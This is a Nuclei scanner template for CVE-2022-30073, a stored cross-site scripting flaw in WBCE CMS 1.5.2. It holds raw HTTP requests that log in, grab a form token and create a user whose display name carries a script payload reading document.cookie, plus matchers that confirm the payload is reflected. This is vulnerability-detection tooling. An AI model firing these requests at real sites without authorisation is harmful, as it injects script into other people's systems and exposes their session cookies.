nuclei-templates/cves/2022/CVE-2022-30073.yaml

75 lines
2.1 KiB
YAML

id: CVE-2022-30073
info:
name: WBCE CMS 1.5.2 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters.
reference:
- https://github.com/APTX-4879/CVE
- https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-30073
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-30073
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,wbcecms,xss
requests:
- raw:
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
- |
GET /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
- |
GET /admin/users/index.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: formtoken
part: body
group: 1
regex:
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
internal: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<p><b><script>alert(document.cookie)</script>"
- "WBCECMS"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14